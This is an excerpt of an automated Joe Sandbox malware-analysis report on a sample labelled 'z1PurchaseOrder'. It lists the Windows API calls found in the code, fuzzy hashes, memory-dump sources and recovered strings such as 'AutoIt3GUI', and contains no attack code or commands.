                                        • Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
                                        • Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 00471102
                                        • GetDC.USER32(00000000), ref: 0047110B
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
                                        • ReleaseDC.USER32(00000000,?), ref: 00471139
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                        • Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
                                        • Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
                                        • Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99
                                        APIs
                                        • SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                        • GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                        • GetCurrentThreadId.KERNEL32 ref: 004389DA
                                        • AttachThreadInput.USER32(00000000), ref: 004389E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                        • String ID:
                                        • API String ID: 2710830443-0
                                        • Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                        • Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
                                        • Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
                                        • Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
                                        • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0
                                          • Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
                                          • Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                        • String ID:
                                        • API String ID: 146765662-0
                                        • Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                        • Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
                                        • Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
                                        • Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65
                                        APIs
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00414070
                                          • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                        • __getptd_noexit.LIBCMT ref: 00414080
                                        • __freeptd.LIBCMT ref: 0041408A
                                        • ExitThread.KERNEL32 ref: 00414093
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
                                        • String ID:
                                        • API String ID: 3182216644-0
                                        • Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                        • Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
                                        • Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
                                        • Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: BuffCharLower
                                        • String ID: $8'I
                                        • API String ID: 2358735015-3608026889
                                        • Opcode ID: e3039598ad07eb1683e22d1e13845cc1c6bfaba1fe80df618d976ecbdfba683b
                                        • Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
                                        • Opcode Fuzzy Hash: e3039598ad07eb1683e22d1e13845cc1c6bfaba1fe80df618d976ecbdfba683b
                                        • Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B
                                        APIs
                                        • OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A
                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                          • Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593
                                          • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                          • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: CopyVariant$ContainedObject$ErrorLast_malloc
                                        • String ID: AutoIt3GUI$Container
                                        • API String ID: 3380330463-3941886329
                                        • Opcode ID: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                        • Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
                                        • Opcode Fuzzy Hash: a9ff7069b9b8d6ccd49eba872ad7efd2467de888f1098c4430e935d21ee713db
                                        • Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55
                                        APIs
                                        • _wcslen.LIBCMT ref: 00409A61
                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                        • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                        • String ID: 0vH
                                        • API String ID: 1143807570-3662162768
                                        • Opcode ID: 06636c051a656e0db8e48e9a81f0f7daa77b956eb8708b24b717754a54bb628e
                                        • Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
                                        • Opcode Fuzzy Hash: 06636c051a656e0db8e48e9a81f0f7daa77b956eb8708b24b717754a54bb628e
                                        • Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: HH$HH
                                        • API String ID: 0-1787419579
                                        • Opcode ID: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                        • Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
                                        • Opcode Fuzzy Hash: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
                                        • Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: InfoItemMenu_memset
                                        • String ID: 0
                                        • API String ID: 2223754486-4108050209
                                        • Opcode ID: 38f09aa922346eb88559bb972c0ed36bedb4057ad35cf6b519ccfeef0a85981d
                                        • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                        • Opcode Fuzzy Hash: 38f09aa922346eb88559bb972c0ed36bedb4057ad35cf6b519ccfeef0a85981d
                                        • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                        APIs
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: '
                                        • API String ID: 3850602802-1997036262
                                        • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                        • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                        • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                        • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                        • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                        • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                        • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                        APIs
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                        • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: Combobox
                                        • API String ID: 3850602802-2096851135
                                        • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                        • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                        • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                        • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                        APIs
                                        • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: LengthMessageSendTextWindow
                                        • String ID: edit
                                        • API String ID: 2978978980-2167791130
                                        • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                        • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                        • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                        • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 00474833
                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: GlobalMemorySleepStatus
                                        • String ID: @
                                        • API String ID: 2783356886-2766056989
                                        • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                        • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                        • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                        • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: htonsinet_addr
                                        • String ID: 255.255.255.255
                                        • API String ID: 3832099526-2422070025
                                        • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                        • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                        • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                        • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                        APIs
                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                        • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 455545452-1403004172
                                        • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                        • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                        • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                        • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: InternetOpen
                                        • String ID: <local>
                                        • API String ID: 2038078732-4266983199
                                        • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                        • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                        • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                        • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                        APIs
                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                        • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 455545452-1403004172
                                        • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                        • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                        • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                        • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                        APIs
                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                        • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
